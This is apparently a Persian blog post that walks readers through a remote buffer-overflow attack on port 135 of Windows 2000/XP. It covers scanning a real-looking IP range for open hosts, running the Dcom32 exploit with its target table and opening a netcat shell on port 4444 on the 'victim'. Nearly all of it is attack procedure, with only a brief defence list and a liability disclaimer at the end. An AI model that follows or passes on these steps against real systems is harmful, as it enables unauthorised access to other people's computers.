افزایش امنیت به میزان 80 درصد

حمله سر ریز بافر روی پورت 135

شرح اکسپلوید از راه دور با حمله سر ریز بافر روی پورت 135 ویندوزهای خانواده ان تی :
فایلهای مورد نیاز:
1- Angry IP Watcher
(اگر با Nmap و دستورات آن آشنایی دارید نیازی به این نرم افزار نیست)
2- Dcom32.exe
3- NetCat
فایلهای مورد نیاز را با استفاده از پیوندهای بالا دانلود کنید . و با winzip یا نرم افزار دیکمپرسور دیگر unzip کنید.(البته خودم نتونستم هیچ کدوم رو دانلود کنم)
حال دایرکتوری شامل NetCat و فایل Dcom32.exe را در درایوی که می خواهید کپی کنید. مثلا C: یا D: تا راحت تر در دسترس باشد . بعد از آن فایل اجرایی IP Scan را اجرا کنید تا برنامه Angry IP Watcher اجرا شود. در این نرم افزار دو جای خالی برای قرار دادن آی پی وجود دارد که مربوط به تعیین محدوده اسکن کردن آی پی ها است . برای اینکه عمل اسکن سریعتر انجام شود محدوده را کوچکتر انتخاب کنید و برای اینکار در دو قسمت جای خالی سه بخش اول آی پی را یکسان پرکنید و بخش چهارم قسمنت اولی را 1 و بخش چهارم قسمت دوم را 255 قرار دهید. به این ترتیب این نرم افزار آی پی های در محدوده 62.220.118.1 تا 62.220.118.255 را اسکن می کند . برای اینکه این حمله روی سسیتم قربانی عمل کند باید اولا سیستم قربانی با یکی از ویندوزهای خانواده NT مثل: XP , Windows 2000 pro بالا آمده باشد و معمولا هم روی همین دو سری عمل می کند و ثانیا پورت 135 سیستم قربانی باز باشد که هدف ما از استفاده از Angry Ip Watcher یافتن آی پی هایی است که الایو یا زنده هستند و پورت 135 آنها باز است. پس از تعییین محدوده اسکن آی پی به option یا تنظیمات نرم افزار بروید و Select Ports را انتخاب کنید
ودر قسمت Ports عدد 135 را وارد کنید و Ok کنید. حالا Start را بزنید تا عمل اسکن شروع شود.
پس از یافت آی پی های معتبر که پورت 135 آنها باز است به خط فرمان (Comand Line) سیستم بروید. این پنجره در ویندوزهای اکس پی و 2000 با اجرای CMD در Run نمایش داده می شود. حال به درایوی که Dcom32 را در آن کپی کرده اید بروید و روی آی پی بدست آمده اکسپلوید Dcom32 را اجرا کنید.
برای اجرا از کدهای زیر استفاده کنید

useage is "target remote-ip"
target is 1-6 where
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)

dcom32 %1 %2
nc -vvv %2 4444

فرض کنیم سیستم عامل قربانی که ما آی پی آنرا بدست آوردیم ویندوز 2000 با سرویس پک 0 باشد بنابراین در خط فرمان می زنیم Dcom32 0 62.220.118.103 اگر اکسپلوید با موفقیت اجرا شده باشد . پیغام زیر داده می شود که نشانگر ان است که حالا ما با NetCat می توانیم روی پورت 4444 کانکت شویم. وارد شاخه ای که Netcat را در آن کپی کریم می شویم و در خط فرمان دستور زیر را تایپ می کنیم Nc -vvv 62.220.118 .103 4444 اگر عمل اتصال با موفقیت انجام شود ما به شاخه D:\Windows\System32\ قربانی دسترسی پیدا می کنیم که با همان دستورات پایه داس می توانیم در سیستم قربانی کاوش کنیم. روش مقابله با این حمله: 1- Patch های امنیتی ماکروسافت را نصب کنید 2- یک فایر وال قدرتمند نصب کنید 3- یک آنتی ویروس به روز داشته باشید 4- Patch های مربوط به ویروسهای w32blaster و Sobig.f را نصب کنید. 5- دور ویندوز اکس پی را خط بکشید

توجه : مسئولیت هر گونه استفاده از این مطلب به عهده کاربر می باشد
امیدوارم از مطالب آموزشی من برای افزایش امنیت خودتون استفاده کنید.